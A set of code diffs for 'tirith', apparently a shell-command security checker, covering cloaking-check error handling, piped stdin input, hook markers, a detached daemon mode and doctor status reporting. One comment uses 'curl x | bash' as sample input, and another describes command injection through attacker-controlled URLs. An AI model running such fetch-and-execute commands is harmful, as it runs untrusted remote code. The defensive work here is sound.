+/// Classify a `reqwest::Error` from the request/connect phase.
+///
+/// A connect failure or a connect-phase timeout means the host is unreachable
+/// regardless of user-agent → `Connect` (short-circuit). reqwest folds DNS
+/// resolution failures into the connect phase, so `is_connect()` covers the
+/// "host does not resolve" case too. Anything else (including redirect-policy
+/// errors such as our SSRF re-validation or too-many-redirects) is `Other` so
+/// the caller keeps probing the other user-agents.
+#[cfg(unix)]
+fn classify_reqwest_err(e: &reqwest::Error) -> FetchErr {
+    if e.is_connect() || e.is_timeout() {
+        FetchErr::Connect(format!("request failed: {e}"))
+    } else {
+        FetchErr::Other(format!("request failed: {e}"))
+    }
+}
+
 #[cfg(unix)]
 impl CloakingResult {
     /// Serialize to JSON; diff text is included only when `include_diff_text`.
@@ -109,7 +166,17 @@ pub fn check(url: &str) -> Result<CloakingResult, String> {
             }
             Err(e) => {
                 eprintln!("tirith: cloaking: {name} fetch failed: {e}");
+                // A host-unreachable failure (DNS/connect) is identical for every
+                // user-agent, so retrying the rest just burns ~5 more timeouts on
+                // the same dead host. Stop now; the `successful_count == 0` guard
+                // below still yields the honest "all fetches failed" error. Other
+                // failures are agent-specific (e.g. a 403/redirect block to one UA
+                // but not another IS the cloaking signal) so we keep probing.
+                let unreachable = e.is_host_unreachable();
                 responses.push((name.to_string(), 0, String::new()));
+                if unreachable {
+                    break;
+                }
             }
         }
     }
@@ -222,18 +289,22 @@ fn fetch_with_ua(
     url: &str,
     ua: &str,
     max_body: usize,
-) -> Result<(u16, String), String> {
+) -> Result<(u16, String), FetchErr> {
+    // Only the request/connect phase can yield a host-unreachable error; an HTTP
+    // error response still resolves to `Ok` here and is reported with its status.
+    // Redirect-policy errors (our SSRF re-validation, too-many-redirects) also
+    // surface from `.send()` but classify as `Other`, so they never short-circuit.
     let response = client
         .get(url)
         .header("User-Agent", ua)
         .send()
-        .map_err(|e| format!("request failed: {e}"))?;
+        .map_err(|e| classify_reqwest_err(&e))?;
 
     let status = response.status().as_u16();
 
     if let Some(len) = response.content_length() {
         if len > max_body as u64 {
-            return Err(format!("response too large: {len} bytes"));
+            return Err(FetchErr::Other(format!("response too large: {len} bytes")));
         }
     }
 
@@ -243,9 +314,12 @@ fn fetch_with_ua(
     response
         .take((max_body as u64) + 1)
         .read_to_end(&mut body_bytes)
-        .map_err(|e| format!("read body: {e}"))?;
+        .map_err(|e| FetchErr::Other(format!("read body: {e}")))?;
     if body_bytes.len() > max_body {
-        return Err(format!("response too large: {} bytes", body_bytes.len()));
+        return Err(FetchErr::Other(format!(
+            "response too large: {} bytes",
+            body_bytes.len()
+        )));
     }
 
     let body = String::from_utf8_lossy(&body_bytes).into_owned();
@@ -442,5 +516,62 @@ mod tests {
             Ok(_) => panic!("expected localhost target to be rejected"),
             Err(err) => assert!(err.contains("localhost")),
         }
+    }
+
+    /// A real connect refusal (loopback port 1, nothing listening — no external
+    /// network, no DNS) must classify as `Connect` so the caller short-circuits.
+    /// This drives `classify_reqwest_err` with a genuine `reqwest::Error` whose
+    /// `is_connect()` is set, which is exactly the loop's break condition.
+    #[test]
+    fn test_classify_connect_refusal_short_circuits() {
+        let client = reqwest::blocking::Client::builder()
+            .timeout(std::time::Duration::from_secs(2))
+            .build()
+            .expect("client");
+        // Port 1 on loopback is reserved and unbound: the kernel refuses the TCP
+        // connect immediately (ECONNREFUSED) without any network egress.
+        let err = client
+            .get("http://127.0.0.1:1/")
+            .send()
+            .expect_err("connection to an unbound loopback port must fail");
+        assert!(
+            err.is_connect(),
+            "expected a connect-phase error, got: {err:?}"
+        );
+
+        let classified = classify_reqwest_err(&err);
+        assert!(
+            classified.is_host_unreachable(),
+            "a connect/DNS failure must short-circuit the user-agent loop"
+        );
+        assert!(matches!(classified, FetchErr::Connect(_)));
+    }
+
+    /// The non-connect path must NOT short-circuit, so the loop keeps probing the
+    /// remaining user-agents. We assert the mapping directly: `FetchErr::Other`
+    /// (oversized/unreadable body, redirect/SSRF rejection, etc.) reports
+    /// `is_host_unreachable() == false`.
+    #[test]
+    fn test_other_fetch_error_does_not_short_circuit() {
+        let other = FetchErr::Other("response too large: 999 bytes".to_string());
+        assert!(
+            !other.is_host_unreachable(),
+            "a non-connect failure must NOT short-circuit — cloaking stays fully tested"
+        );
+    }
+
+    /// An HTTP error response is never a `FetchErr`: `fetch_with_ua` returns it as
+    /// `Ok((status, body))`, so a 403-to-one-UA vs 200-to-another stays visible to
+    /// the diff logic and is never mistaken for a host-unreachable short-circuit.
+    /// Guard the contract: only `FetchErr::Connect` is host-unreachable.
+    #[test]
+    fn test_http_status_is_not_a_fetch_error() {
+        // Status differences travel through the Ok branch as a u16, not FetchErr.
+        let ok: Result<(u16, String), FetchErr> = Ok((403, "Forbidden".to_string()));
+        assert!(matches!(ok, Ok((403, _))));
+
+        // And of the two error variants, only Connect is treated as unreachable.
+        assert!(FetchErr::Connect(String::new()).is_host_unreachable());
+        assert!(!FetchErr::Other(String::new()).is_host_unreachable());
     }
 }

--- a/crates/tirith-core/src/safe_command.rs
+++ b/crates/tirith-core/src/safe_command.rs
@@ -1033,7 +1033,15 @@ fn sanitize_for_display(s: &str) -> String {
 /// Returns `None` when the token contains a byte that cannot be safely carried
 /// in a single-token single-quoted string — a newline (`\n`) or NUL — so the
 /// caller refuses the rewrite rather than emit a multi-line / truncated command.
-fn shell_single_quote(s: &str) -> Option<String> {
+///
+/// `pub` so the copy-paste suggestion surfaces in both crates can neutralize an
+/// attacker-controlled URL/domain before interpolating it into a suggested
+/// `tirith trust add …` line (`output.rs::write_block_advisories`,
+/// `trust.rs::format_add_line`): a blocked URL carrying `$( )`, backticks, `;`,
+/// spaces, redirects, or globs would otherwise EXECUTE when the developer copies
+/// the line. `sanitize_field` only strips terminal-control bytes; it is NOT a
+/// shell escaper.
+pub fn shell_single_quote(s: &str) -> Option<String> {
     if s.bytes().any(|b| b == b'\n' || b == b'\0') {
         return None;
     }

--- a/crates/tirith/assets/shell/lib/fish-hook.fish
+++ b/crates/tirith/assets/shell/lib/fish-hook.fish
@@ -145,7 +145,7 @@ if functions -q fish_clipboard_paste; and not functions -q _tirith_original_fish
         end
 
         set -l tmpfile (mktemp)
-        echo -n "$content" | command tirith paste --shell fish --interactive >$tmpfile 2>&1
+        echo -n "$content" | env _TIRITH_HOOK=1 command tirith paste --shell fish --interactive >$tmpfile 2>&1
         set -l rc $status
         set -l output (string collect < $tmpfile)
         command rm -f $tmpfile
@@ -193,7 +193,7 @@ function _tirith_check_command
     # and command substitution (set -l x (cmd)) can hang in that context.
     set -l outfile (mktemp)
     set -l errfile (mktemp)
-    command tirith check --approval-check --non-interactive --interactive --shell fish -- "$cmd" >$outfile 2>$errfile
+    env _TIRITH_HOOK=1 command tirith check --approval-check --non-interactive --interactive --shell fish -- "$cmd" >$outfile 2>$errfile
     set -l rc $status
     # Read stdout lines: line 1 = approval path, line 2 = warn-ack path (exit code 3 only)
     set -l approval_path ""

--- a/crates/tirith/assets/shell/lib/nushell-hook.nu
+++ b/crates/tirith/assets/shell/lib/nushell-hook.nu
@@ -62,7 +62,7 @@ if (($nu.is-interactive) and (not ('_TIRITH_NU_LOADED' in $env))) {
 
             $env._TIRITH_NU_RUNNING = true
             try {
-                let result = (do { ^tirith check --non-interactive --interactive --shell posix -- $cmd } | complete)
+                let result = (with-env {_TIRITH_HOOK: "1"} { do { ^tirith check --non-interactive --interactive --shell posix -- $cmd } | complete })
                 $env._TIRITH_NU_RUNNING = false
 
                 if $result.exit_code != 0 {

--- a/crates/tirith/assets/shell/lib/powershell-hook.ps1
+++ b/crates/tirith/assets/shell/lib/powershell-hook.ps1
@@ -204,9 +204,14 @@ Set-PSReadLineKeyHandler -Key Enter -ScriptBlock {
 
     # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
     $errfile = [System.IO.Path]::GetTempFileName()
+    $prevHook = $env:_TIRITH_HOOK
     $env:_TIRITH_HOOK = '1'
-    $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
-    $rc = $LASTEXITCODE
+    try {
+        $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
+        $rc = $LASTEXITCODE
+    } finally {
+        if ($null -eq $prevHook) { Remove-Item Env:\_TIRITH_HOOK -ErrorAction SilentlyContinue } else { $env:_TIRITH_HOOK = $prevHook }
+    }
     $output = Get-Content $errfile -Raw -ErrorAction SilentlyContinue
     Remove-Item $errfile -Force -ErrorAction SilentlyContinue
 
@@ -324,9 +329,14 @@ Set-PSReadLineKeyHandler -Key Ctrl+v -ScriptBlock {
 
     # Check with tirith paste, use temp file to prevent output leakage
     $tmpfile = [System.IO.Path]::GetTempFileName()
+    $prevHook = $env:_TIRITH_HOOK
     $env:_TIRITH_HOOK = '1'
-    $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
-    $rc = $LASTEXITCODE
+    try {
+        $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
+        $rc = $LASTEXITCODE
+    } finally {
+        if ($null -eq $prevHook) { Remove-Item Env:\_TIRITH_HOOK -ErrorAction SilentlyContinue } else { $env:_TIRITH_HOOK = $prevHook }
+    }
     $output = Get-Content $tmpfile -Raw -ErrorAction SilentlyContinue
     Remove-Item $tmpfile -Force -ErrorAction SilentlyContinue
 

--- a/crates/tirith/assets/shell/lib/powershell-hook.ps1
+++ b/crates/tirith/assets/shell/lib/powershell-hook.ps1
@@ -204,6 +204,7 @@ Set-PSReadLineKeyHandler -Key Enter -ScriptBlock {
 
     # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
     $errfile = [System.IO.Path]::GetTempFileName()
+    $env:_TIRITH_HOOK = '1'
     $approvalPath = & tirith check --approval-check --non-interactive --interactive --shell powershell -- $line 2>$errfile
     $rc = $LASTEXITCODE
     $output = Get-Content $errfile -Raw -ErrorAction SilentlyContinue
@@ -323,6 +324,7 @@ Set-PSReadLineKeyHandler -Key Ctrl+v -ScriptBlock {
 
     # Check with tirith paste, use temp file to prevent output leakage
     $tmpfile = [System.IO.Path]::GetTempFileName()
+    $env:_TIRITH_HOOK = '1'
     $pasted | & tirith paste --shell powershell --interactive > $tmpfile 2>&1
     $rc = $LASTEXITCODE
     $output = Get-Content $tmpfile -Raw -ErrorAction SilentlyContinue

--- a/crates/tirith/assets/shell/lib/zsh-hook.zsh
+++ b/crates/tirith/assets/shell/lib/zsh-hook.zsh
@@ -138,7 +138,7 @@ _tirith_accept_line() {
   # Run tirith check with approval workflow (stdout=approval file path, stderr=human output)
   local errfile=$(mktemp)
   local approval_path
-  approval_path=$(command tirith check --approval-check --non-interactive --interactive --shell posix -- "$buf" 2>"$errfile")
+  approval_path=$(_TIRITH_HOOK=1 command tirith check --approval-check --non-interactive --interactive --shell posix -- "$buf" 2>"$errfile")
   local rc=$?
   local output=$(<"$errfile")
   command rm -f "$errfile"
@@ -264,7 +264,7 @@ _tirith_bracketed_paste() {
   if [[ -n "$pasted" ]]; then
     # Pipe pasted content to tirith paste, use temp file to prevent tty leakage
     local tmpfile=$(mktemp)
-    echo -n "$pasted" | command tirith paste --shell posix --interactive >"$tmpfile" 2>&1
+    echo -n "$pasted" | _TIRITH_HOOK=1 command tirith paste --shell posix --interactive >"$tmpfile" 2>&1
     local rc=$?
     local output=$(<"$tmpfile")
     command rm -f "$tmpfile"

--- a/crates/tirith/src/cli/check.rs
+++ b/crates/tirith/src/cli/check.rs
@@ -37,7 +37,9 @@ pub fn run(
                 &stdin_cmd
             }
             Err(e) => {
-                eprintln!("tirith: failed to read stdin: {e}");
+                // Fail CLOSED: an unreadable or OVER-LIMIT stream must never fall
+                // through to a clean "no issues" verdict on a truncated command.
+                eprintln!("tirith: cannot analyze piped input: {e}");
                 return 1;
             }
         }

--- a/crates/tirith/src/cli/check.rs
+++ b/crates/tirith/src/cli/check.rs
@@ -1,3 +1,5 @@
+use std::io::IsTerminal;
+
 use crate::cli::last_trigger;
 use tirith_core::engine::{self, AnalysisContext};
 use tirith_core::escalation::CallerContext;
@@ -22,6 +24,27 @@ pub fn run(
     suggest_safe_command: bool,
     card: Option<String>,
 ) -> i32 {
+    // When clap left the positional empty and this is NOT the `--approval-check`
+    // path (which has its own no-input contract below), accept the command from
+    // piped stdin so `echo 'curl x | bash' | tirith check` works. Only read when
+    // stdin is NOT a terminal, so an interactive `tirith check` with no argv still
+    // returns silently rather than blocking on a TTY. Mirrors paste.rs's 1 MiB cap.
+    let stdin_cmd: String;
+    let cmd: &str = if cmd.trim().is_empty() && !approval_check && !std::io::stdin().is_terminal() {
+        match crate::cli::read_stdin_capped(1024 * 1024) {
+            Ok(bytes) => {
+                stdin_cmd = String::from_utf8_lossy(&bytes).into_owned();
+                &stdin_cmd
+            }
+            Err(e) => {
+                eprintln!("tirith: failed to read stdin: {e}");
+                return 1;
+            }
+        }
+    } else {
+        cmd
+    };
+
     if cmd.trim().is_empty() {
         if approval_check {
             match tirith_core::approval::write_no_approval_file() {
@@ -202,6 +225,7 @@ pub fn run(
     let ran_locally = engine_policy.is_some();
     let policy =
         engine_policy.unwrap_or_else(|| tirith_core::policy::Policy::discover(cwd.as_deref()));
+    crate::cli::warn_repo_policy_neutralized(&policy);
 
     if ran_locally {
         let runtime_findings = tirith_core::threatdb_api::enrich_command(
@@ -388,6 +412,17 @@ pub fn run(
         }
         if output::write_safe_suggestions(&safe_suggestions, std::io::stderr().lock()).is_err() {
             eprintln!("tirith: failed to write safe-command suggestions");
+        }
+        // On a clean human verdict from DIRECT CLI use, confirm nothing was found
+        // (`write_human_auto` is silent on no findings). Gated OFF for hook
+        // invocations — a per-keystroke "no issues" would be noise — detected via
+        // the `_TIRITH_HOOK` / `_TIRITH_BASH_INTERNAL` markers the shell hooks set.
+        // `note` is already `--quiet`-aware. Never emitted in the JSON branch.
+        if effective.findings.is_empty()
+            && std::env::var("_TIRITH_HOOK").is_err()
+            && std::env::var("_TIRITH_BASH_INTERNAL").is_err()
+        {
+            crate::cli::note("tirith: no issues");
         }
     }
 

--- a/crates/tirith/src/cli/daemon.rs
+++ b/crates/tirith/src/cli/daemon.rs
@@ -970,6 +970,12 @@ fn start_detached() -> i32 {
         }
     }
 
+    // No live daemon owns this socket (the PID guard above did not short-circuit),
+    // so any socket file here is stale. Remove it before spawning so `poll_startup`
+    // only sees a socket the freshly spawned child actually (re)bound — otherwise a
+    // leftover file yields a premature/false `SocketUp`.
+    let _ = std::fs::remove_file(&sock);
+
     // Mirror the detached-spawn idiom used by the periodic threat-DB updater:
     // null all stdio so the background daemon holds no terminal fds, and
     // `setsid()` in the forked child so it leaves the controlling TTY and

--- a/crates/tirith/src/cli/daemon.rs
+++ b/crates/tirith/src/cli/daemon.rs
@@ -953,6 +953,23 @@ fn start_detached() -> i32 {
 
     let sock = socket_path();
 
+    // Pre-spawn already-running guard, mirroring the foreground `start()` path.
+    // Without this, an existing daemon's live socket makes `poll_startup` return
+    // `SocketUp` on the first iteration, so we'd print "started in background
+    // (PID …)" for the throwaway child that is about to exit 1, masking the
+    // real daemon and giving no "already running" feedback. Short-circuit here.
+    let pid_file = pid_path();
+    if pid_file.exists() {
+        if let Ok(content) = std::fs::read_to_string(&pid_file) {
+            if let Ok(pid_num) = content.trim().parse::<u32>() {
+                if process_alive(pid_num) {
+                    eprintln!("tirith: daemon already running (PID {pid_num})");
+                    return 1;
+                }
+            }
+        }
+    }
+
     // Mirror the detached-spawn idiom used by the periodic threat-DB updater:
     // null all stdio so the background daemon holds no terminal fds, and
     // `setsid()` in the forked child so it leaves the controlling TTY and
@@ -1695,6 +1712,39 @@ mod tests {
             "socket must exist after start"
         );
         assert_eq!(super::status(), 0, "daemon must be reachable via ping");
+
+        assert_eq!(super::stop(), 0, "stop() must shut the daemon down");
+
+        std::env::remove_var("XDG_STATE_HOME");
+    }
+
+    /// The detach path honors the pre-spawn already-running guard: once a daemon
+    /// is up, a second `start(true)` must short-circuit with `1` (mirroring the
+    /// foreground path) instead of mistaking the live socket for a freshly bound
+    /// child and reporting `0`.
+    ///
+    /// `#[ignore]` for the same reason as the end-to-end test above: it points
+    /// process-global `XDG_STATE_HOME` at a temp dir and binds a real socket,
+    /// which races the other parallel env-reading tests. Run with `--ignored`.
+    #[cfg(unix)]
+    #[test]
+    #[ignore = "mutates process-global XDG_STATE_HOME and binds a real socket; run with --ignored in isolation"]
+    fn start_detach_short_circuits_when_already_running() {
+        let tmp = TmpDir::new("detach-already-running");
+        std::fs::create_dir_all(&tmp.0).expect("create state dir");
+        std::env::set_var("XDG_STATE_HOME", &tmp.0);
+
+        // Clean slate, then bring a daemon up so the socket + PID file exist.
+        let _ = super::stop();
+        assert_eq!(super::start(true), 0, "first start(true) must succeed");
+
+        // Second detach attempt must hit the already-running guard and return 1,
+        // NOT report a spurious "started in background" for a throwaway child.
+        assert_eq!(
+            super::start(true),
+            1,
+            "a second start(true) must short-circuit as already-running"
+        );
 
         assert_eq!(super::stop(), 0, "stop() must shut the daemon down");
 

--- a/crates/tirith/src/cli/daemon.rs
+++ b/crates/tirith/src/cli/daemon.rs
@@ -897,7 +897,11 @@ fn kill_process(pid: u32) -> bool {
 }
 
 #[cfg(unix)]
-pub fn start() -> i32 {
+pub fn start(detach: bool) -> i32 {
+    if detach {
+        return start_detached();
+    }
+
     let sock = socket_path();
     let pid = pid_path();
 
@@ -921,8 +925,142 @@ pub fn start() -> i32 {
     run_server(&sock, &pid)
 }
 
+/// Re-spawn `tirith daemon start` (no `--detach`, so the child runs the
+/// foreground path that binds the socket and writes the PID file) detached from
+/// this process, then VERIFY it actually came up before reporting success.
+///
+/// FIX S1: never report "started" blindly. After spawning we poll for up to ~2s
+/// for the socket to appear while confirming the child is still alive
+/// (`try_wait() == Ok(None)`). Three outcomes:
+///   * socket appears, child alive → success (return 0);
+///   * child exits early (`try_wait()` yields a status) → the foreground path
+///     refused/failed (e.g. already-running, runtime-dir gate, bind error);
+///     report it and return 1;
+///   * timeout with no socket → report failure, best-effort kill the orphaned
+///     child, return 1.
+#[cfg(unix)]
+fn start_detached() -> i32 {
+    use std::os::unix::process::CommandExt;
+    use std::process::{Command, Stdio};
+
+    let exe = match std::env::current_exe() {
+        Ok(p) => p,
+        Err(e) => {
+            eprintln!("tirith: cannot determine current executable to detach: {e}");
+            return 1;
+        }
+    };
+
+    let sock = socket_path();
+
+    // Mirror the detached-spawn idiom used by the periodic threat-DB updater:
+    // null all stdio so the background daemon holds no terminal fds, and
+    // `setsid()` in the forked child so it leaves the controlling TTY and
+    // becomes a session/group leader (it won't die on terminal close / Ctrl-C).
+    let mut cmd = Command::new(&exe);
+    cmd.args(["daemon", "start"])
+        .stdin(Stdio::null())
+        .stdout(Stdio::null())
+        .stderr(Stdio::null());
+    // SAFETY: `setsid` is async-signal-safe and is the only call in the forked
+    // child before exec; it detaches the child from the controlling terminal.
+    unsafe {
+        cmd.pre_exec(|| {
+            libc::setsid();
+            Ok(())
+        });
+    }
+
+    let mut child = match cmd.spawn() {
+        Ok(c) => c,
+        Err(e) => {
+            eprintln!("tirith: failed to spawn background daemon: {e}");
+            return 1;
+        }
+    };
+
+    // FIX S1: verify the daemon actually bound before reporting success. Poll up
+    // to ~2s (20 × 100ms) for the socket, bailing early if the child exits.
+    let child_id = child.id();
+    match poll_startup(&mut child, &sock, 20, std::time::Duration::from_millis(100)) {
+        StartupOutcome::SocketUp => {
+            eprintln!("tirith: daemon started in background (PID {child_id})");
+            0
+        }
+        StartupOutcome::ChildExited(status) => {
+            // The foreground child exited before binding — surface its status.
+            eprintln!("tirith: daemon failed to start (exited {status})");
+            1
+        }
+        StartupOutcome::PollError(e) => {
+            eprintln!("tirith: failed to poll background daemon: {e}");
+            let _ = child.kill();
+            let _ = child.wait();
+            1
+        }
+        StartupOutcome::TimedOut => {
+            // The child may be wedged — best-effort kill so we don't leave an
+            // orphan, then report failure.
+            eprintln!(
+                "tirith: daemon did not come up within 2s (no socket at {})",
+                sock.display()
+            );
+            let _ = child.kill();
+            let _ = child.wait();
+            1
+        }
+    }
+}
+
+/// Result of polling a freshly spawned detached daemon for startup (FIX S1).
+#[cfg(unix)]
+#[derive(Debug)]
+enum StartupOutcome {
+    /// The socket appeared while the child was still alive — daemon is up.
+    SocketUp,
+    /// The child exited before the socket appeared, carrying its exit status.
+    ChildExited(std::process::ExitStatus),
+    /// `try_wait()` itself errored.
+    PollError(std::io::Error),
+    /// The attempt budget elapsed with no socket and the child still running.
+    TimedOut,
+}
+
+/// Poll `child` up to `attempts` times (sleeping `delay` between attempts) for
+/// `sock` to exist, treating early child exit as failure.
+///
+/// On each attempt: if `try_wait()` shows the child EXITED, return
+/// [`StartupOutcome::ChildExited`] (the foreground daemon refused/crashed before
+/// binding). If the child is still alive AND the socket now exists, return
+/// [`StartupOutcome::SocketUp`]. If `try_wait()` errors, return
+/// [`StartupOutcome::PollError`]. If the budget is exhausted with neither, return
+/// [`StartupOutcome::TimedOut`]. The socket is checked only while the child is
+/// confirmed alive so a stale socket from a crashed child is never mistaken for a
+/// successful start.
+#[cfg(unix)]
+fn poll_startup(
+    child: &mut std::process::Child,
+    sock: &std::path::Path,
+    attempts: u32,
+    delay: std::time::Duration,
+) -> StartupOutcome {
+    for _ in 0..attempts {
+        match child.try_wait() {
+            Ok(Some(status)) => return StartupOutcome::ChildExited(status),
+            Ok(None) => {
+                if sock.exists() {
+                    return StartupOutcome::SocketUp;
+                }
+            }
+            Err(e) => return StartupOutcome::PollError(e),
+        }
+        std::thread::sleep(delay);
+    }
+    StartupOutcome::TimedOut
+}
+
 #[cfg(not(unix))]
-pub fn start() -> i32 {
+pub fn start(_detach: bool) -> i32 {
     eprintln!("tirith: daemon requires Unix; Windows named pipe support coming soon");
     1
 }
@@ -1421,5 +1559,145 @@ mod tests {
             "with no state_dir, XDG_RUNTIME_DIR/tirith should win"
         );
         std::env::remove_var("XDG_RUNTIME_DIR");
+    }
+
+    // ---- D: `daemon start --detach` startup verification (FIX S1) ----
+
+    /// Spawn a real, long-lived child so `poll_startup` can observe it as alive.
+    /// Killed on drop so a passing/failing test never leaks a process.
+    #[cfg(unix)]
+    struct LiveChild(std::process::Child);
+
+    #[cfg(unix)]
+    impl LiveChild {
+        /// A process that stays alive well past the poll budget.
+        fn sleeping() -> Self {
+            let child = std::process::Command::new("sleep")
+                .arg("30")
+                .stdin(std::process::Stdio::null())
+                .stdout(std::process::Stdio::null())
+                .stderr(std::process::Stdio::null())
+                .spawn()
+                .expect("spawn `sleep 30`");
+            Self(child)
+        }
+    }
+
+    #[cfg(unix)]
+    impl Drop for LiveChild {
+        fn drop(&mut self) {
+            let _ = self.0.kill();
+            let _ = self.0.wait();
+        }
+    }
+
+    /// When the socket appears while the child is still alive, `poll_startup`
+    /// reports `SocketUp` — the success path of FIX S1.
+    #[cfg(unix)]
+    #[test]
+    fn poll_startup_reports_socket_up_when_socket_appears() {
+        let tmp = TmpDir::new("poll-up");
+        std::fs::create_dir_all(&tmp.0).expect("dir");
+        let sock = tmp.0.join("daemon.sock");
+        // Create the "socket" file up front; the live child never touches it, so
+        // this isolates the socket-appeared decision from any real daemon.
+        std::fs::write(&sock, b"").expect("create sock placeholder");
+
+        let mut live = LiveChild::sleeping();
+        let outcome =
+            super::poll_startup(&mut live.0, &sock, 20, std::time::Duration::from_millis(5));
+        assert!(
+            matches!(outcome, super::StartupOutcome::SocketUp),
+            "socket present + child alive must yield SocketUp, got {outcome:?}"
+        );
+    }
+
+    /// When the child exits before the socket appears, `poll_startup` reports
+    /// `ChildExited` (carrying the status) instead of blindly succeeding — the
+    /// core of FIX S1.
+    #[cfg(unix)]
+    #[test]
+    fn poll_startup_reports_child_exited_when_child_dies() {
+        let tmp = TmpDir::new("poll-exit");
+        std::fs::create_dir_all(&tmp.0).expect("dir");
+        // No socket is ever created.
+        let sock = tmp.0.join("daemon.sock");
+
+        // `true` exits 0 immediately; wait for it so the first `try_wait()` in
+        // `poll_startup` observes the exit deterministically.
+        let mut child = std::process::Command::new("true")
+            .stdin(std::process::Stdio::null())
+            .stdout(std::process::Stdio::null())
+            .stderr(std::process::Stdio::null())
+            .spawn()
+            .expect("spawn `true`");
+        let _ = child.wait();
+
+        let outcome =
+            super::poll_startup(&mut child, &sock, 20, std::time::Duration::from_millis(5));
+        match outcome {
+            super::StartupOutcome::ChildExited(status) => {
+                assert!(status.success(), "`true` exits 0");
+            }
+            other => panic!("an early-exiting child must yield ChildExited, got {other:?}"),
+        }
+        assert!(!sock.exists(), "no socket should have been created");
+    }
+
+    /// When the child stays alive but the socket never appears, `poll_startup`
+    /// reports `TimedOut` after exhausting its attempt budget.
+    #[cfg(unix)]
+    #[test]
+    fn poll_startup_times_out_when_no_socket() {
+        let tmp = TmpDir::new("poll-timeout");
+        std::fs::create_dir_all(&tmp.0).expect("dir");
+        let sock = tmp.0.join("daemon.sock"); // never created
+
+        let mut live = LiveChild::sleeping();
+        let outcome = super::poll_startup(
+            &mut live.0,
+            &sock,
+            3, // tiny budget so the test is fast
+            std::time::Duration::from_millis(5),
+        );
+        assert!(
+            matches!(outcome, super::StartupOutcome::TimedOut),
+            "alive child + no socket must time out, got {outcome:?}"
+        );
+    }
+
+    /// End-to-end: `start(true)` spawns a detached daemon, the socket appears,
+    /// the daemon is reachable (`status()` pings it successfully), then `stop()`
+    /// tears it down.
+    ///
+    /// `#[ignore]` because it points process-global `XDG_STATE_HOME` at a temp
+    /// dir (so the detached child resolves an isolated runtime dir) and actually
+    /// binds a socket — mutating that env races the other parallel env-reading
+    /// tests in this binary. Run with `--ignored` in isolation.
+    #[cfg(unix)]
+    #[test]
+    #[ignore = "mutates process-global XDG_STATE_HOME and binds a real socket; run with --ignored in isolation"]
+    fn start_detach_spawns_verifies_and_stops() {
+        let tmp = TmpDir::new("detach-e2e");
+        std::fs::create_dir_all(&tmp.0).expect("create state dir");
+        std::env::set_var("XDG_STATE_HOME", &tmp.0);
+
+        // Ensure a clean slate (no leftover pid/sock from a prior run).
+        let _ = super::stop();
+
+        let code = super::start(true);
+        assert_eq!(code, 0, "start(true) must verify startup and return 0");
+
+        // The detached child's foreground `run_server` bound the socket and wrote
+        // the PID file; `status()` connects + pings to confirm reachability.
+        assert!(
+            super::socket_path().exists(),
+            "socket must exist after start"
+        );
+        assert_eq!(super::status(), 0, "daemon must be reachable via ping");
+
+        assert_eq!(super::stop(), 0, "stop() must shut the daemon down");
+
+        std::env::remove_var("XDG_STATE_HOME");
     }
 }

--- a/crates/tirith/src/cli/doctor.rs
+++ b/crates/tirith/src/cli/doctor.rs
@@ -198,7 +198,12 @@ fn run_fix(yes: bool) -> i32 {
     }
 
     if fixed == 0 {
-        println!("tirith: no issues to fix");
+        if shadows.is_empty() {
+            println!("tirith: no issues to fix");
+        } else {
+            // Shadow guidance was printed above but isn't auto-fixable; don't claim "nothing to fix".
+            println!("tirith: no auto-fixable issues (see manual steps above)");
+        }
     } else {
         println!("tirith: fixed {fixed} issue(s)");
     }

--- a/crates/tirith/src/cli/doctor.rs
+++ b/crates/tirith/src/cli/doctor.rs
@@ -710,12 +710,24 @@ pub(crate) fn gather_quick_info() -> QuickDoctorInfo {
     let detected_shell = crate::cli::init::detect_shell().to_string();
     let (_profile, hook_configured) = check_shell_profile(&detected_shell, "tirith: doctor:");
 
-    let tirith_status = std::env::var("TIRITH_STATUS")
+    // Prefer the EXPORTED effective-protection signal. A manually-run `tirith
+    // status` / `doctor --quick` is an EXTERNAL process, and `TIRITH_STATUS` is
+    // deliberately NON-exported (prompt-only), so a protected shell never passes
+    // it down — reading it alone makes a protected shell look "off". The bash hook
+    // re-exports `TIRITH_BASH_EFFECTIVE_PROTECTION` on every state change PRECISELY
+    // so an external check sees the truth; fall back to `TIRITH_STATUS` only for a
+    // user/shell that does export it.
+    let live_protection = std::env::var("TIRITH_BASH_EFFECTIVE_PROTECTION")
         .ok()
-        .filter(|s| !s.is_empty());
+        .filter(|s| !s.is_empty())
+        .or_else(|| {
+            std::env::var("TIRITH_STATUS")
+                .ok()
+                .filter(|s| !s.is_empty())
+        });
     // Shared with `tirith prompt-status` so the two surfaces never drift.
     let protection_mode =
-        crate::cli::prompt_status::protection_mode_from_status(tirith_status.as_deref());
+        crate::cli::prompt_status::protection_mode_from_status(live_protection.as_deref());
 
     let cwd = std::env::current_dir()
         .ok()

--- a/crates/tirith/src/cli/doctor.rs
+++ b/crates/tirith/src/cli/doctor.rs
@@ -3527,6 +3527,11 @@ mod tests {
         let _lock = ENV_LOCK.lock().unwrap_or_else(|p| p.into_inner());
         // Restore ambient `TIRITH_STATUS` on Drop; overwritten per-iteration.
         let _status_guard = EnvGuard::remove("TIRITH_STATUS");
+        // `gather_quick_info` now prefers `TIRITH_BASH_EFFECTIVE_PROTECTION`; a
+        // dev running `cargo test` inside a tirith-protected shell would have it
+        // ambiently exported, which would override the per-iteration
+        // `TIRITH_STATUS` and spuriously diverge from `prompt-status`.
+        let _eff_guard = EnvGuard::remove("TIRITH_BASH_EFFECTIVE_PROTECTION");
 
         for status in ["blocks", "warn-only", "degraded", "off", "", "futureValue"] {
             // SAFETY: serialized via ENV_LOCK above; restored by the guard.
@@ -3540,6 +3545,40 @@ mod tests {
                 "doctor --quick and prompt-status disagree for TIRITH_STATUS={status:?}"
             );
         }
+    }
+
+    /// `gather_quick_info` prefers the EXPORTED `TIRITH_BASH_EFFECTIVE_PROTECTION`
+    /// signal and only falls back to `TIRITH_STATUS` when the effective var is
+    /// unset/empty. `TIRITH_STATUS` is non-exported, so a protected external
+    /// process must read the re-exported effective var to see the truth.
+    #[test]
+    fn gather_quick_info_prefers_effective_protection_over_status() {
+        let _lock = ENV_LOCK.lock().unwrap_or_else(|p| p.into_inner());
